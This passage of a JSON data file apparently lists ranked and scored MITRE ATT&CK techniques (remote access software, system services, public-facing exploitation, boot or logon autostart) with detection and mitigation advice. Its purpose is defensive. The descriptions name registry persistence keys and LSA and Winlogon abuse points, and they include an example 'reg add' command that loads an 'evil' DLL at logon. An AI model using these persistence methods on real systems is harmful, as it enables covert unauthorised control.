techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)\nAdversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: Match Legitimate Name or Location).(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "url": "https://attack.mitre.org/techniques/T1204/003", + "detection": "Monitor the local image registry to make sure malicious images are not added. Track the deployment of new containers, especially from newly built images. Monitor the behavior of containers within the environment to detect anomalous behavior or malicious activity after users deploy from malicious images.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1045", + "name": "Code Signing", + "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.", + "url": "https://attack.mitre.org/mitigations/M1045" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + } + ] + }, + { + "rank": 18, + "tid": "T1219", + "name": "Remote Access Software", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nRemote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.\nAdmin tools such as TeamViewer have been used by several groups targeting institutions in countries of interest to the Russian state and criminal campaigns. (Citation: CrowdStrike 2015 Global Threat Report) (Citation: CrySyS Blog TeamSpy)", + "url": "https://attack.mitre.org/techniques/T1219", + "detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\nDomain Fronting may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.", + "score": 1.7399708525390474, + "process_score": 0.2, + "file_score": 0.2, + "cloud_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "subtechniques": [] + }, + { + "rank": 19, + "tid": "T1569", + "name": "System Services", + "description": "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution.", + "url": "https://attack.mitre.org/techniques/T1569", + "detection": "Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.", + "score": 1.7116948465285715, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ], + "subtechniques": [ + { + "tid": "T1569.001", + "name": "System Services: Launchctl", + "description": "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\nAdversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute Launch Agents or Launch Daemons.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)", + "url": "https://attack.mitre.org/techniques/T1569/001", + "detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. Launch Agents or Launch Daemons with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \nWhen removing Launch Agents or Launch Daemons ensure the services are unloaded prior to deleting plist files.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + }, + { + "tid": "T1569.002", + "name": "System Services: Service Execution", + "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.\nPsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as PsExec and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.", + "url": "https://attack.mitre.org/techniques/T1569/002", + "detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + } + ] + } + ] + }, + { + "rank": 20, + "tid": "T1190", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include Exploitation for Defense Evasion. \nIf an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via Escape to Host, or take advantage of weak identity and access management policies.\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", + "url": "https://attack.mitre.org/techniques/T1190", + "detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", + "score": 1.6976671798609522, + "network_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 21, + "tid": "T1547", + "name": "Boot or Logon Autostart Execution", + "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", + "url": "https://attack.mitre.org/techniques/T1547", + "detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.", + "score": 1.676913729078095, + "process_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [ + { + "tid": "T1547.001", + "name": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", + "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup. The startup folder path for all users is C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp.\nThe following run keys are created by default on Windows systems:\n
    \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    • \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce
    • \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    • \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce
    • \n
\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\nThe following Registry keys can be used to set startup folder items for persistence:\n
    \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders
    • \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
    • \n
  • HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders
    • \n
  • HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders
    • \n
\nThe following Registry keys can control automatic startup of services during boot:\n
    \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce
    • \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce
    • \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
    • \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
    • \n
\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n
    \n
  • HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
    • \n
  • HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
    • \n
\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.", + "url": "https://attack.mitre.org/techniques/T1547/001", + "detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [] + }, + { + "tid": "T1547.002", + "name": "Boot or Logon Autostart Execution: Authentication Package", + "description": "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)\nAdversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\ with the key value of \"Authentication Packages\"=<target binary>. The binary will then be executed by the system when the authentication packages are loaded.", + "url": "https://attack.mitre.org/techniques/T1547/002", + "detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ] + }, + { + "tid": "T1547.003", + "name": "Boot or Logon Autostart Execution: Time Providers", + "description": "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)\nTime providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)\nAdversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)", + "url": "https://attack.mitre.org/techniques/T1547/003", + "detection": "Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017)\nThe Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. (Citation: TechNet Autoruns)", + "mitigations": [ + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1024", + "name": "Restrict Registry Permissions", + "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.", + "url": "https://attack.mitre.org/mitigations/M1024" + } + ] + }, + { + "tid": "T1547.004", + "name": "Boot or Logon Autostart Execution: Winlogon Helper DLL", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\Wow6432Node\\]\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013) \nMalicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n
    \n
  • Winlogon\\Notify - points to notification package DLLs that handle Winlogon events
    • \n
  • Winlogon\\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
    • \n
  • Winlogon\\Shell - points to explorer.exe, the system shell executed when a user logs on
    • \n
\nAdversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.", + "url": "https://attack.mitre.org/techniques/T1547/004", + "detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ] + }, + { + "tid": "T1547.005", + "name": "Boot or Logon Autostart Execution: Security Support Provider", + "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)", + "url": "https://attack.mitre.org/techniques/T1547/005", + "detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + } + ] + }, + { + "tid": "T1547.006", + "name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions", + "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) \nWhen used maliciously, LKMs can be a type of kernel-mode Rootkit that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)", + "url": "https://attack.mitre.org/techniques/T1547/006", + "detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1049", + "name": "Antivirus/Antimalware", + "description": "Use signatures or heuristics to detect malicious software.", + "url": "https://attack.mitre.org/mitigations/M1049" + } + ] + }, + { + "tid": "T1547.007", + "name": "Boot or Logon Autostart Execution: Re-opened Applications", + "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).", + "url": "https://attack.mitre.org/techniques/T1547/007", + "detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1547.008", + "name": "Boot or Logon Autostart Execution: LSASS Driver", + "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., Hijack Execution Flow), an adversary can use LSA operations to continuously execute malicious payloads.", + "url": "https://attack.mitre.org/techniques/T1547/008", + "detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ", + "mitigations": [ + { + "mid": "M1025", + "name": "Privileged Process Integrity", + "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.", + "url": "https://attack.mitre.org/mitigations/M1025" + }, + { + "mid": "M1043", + "name": "Credential Access Protection", + "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.", + "url": "https://attack.mitre.org/mitigations/M1043" + }, + { + "mid": "M1044", + "name": "Restrict Library Loading", + "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.", + "url": "https://attack.mitre.org/mitigations/M1044" + } + ] + }, + { + "tid": "T1547.009", + "name": "Boot or Logon Autostart Execution: Shortcut Modification", + "description": "Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.", + "url": "https://attack.mitre.org/techniques/T1547/009", + "detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, 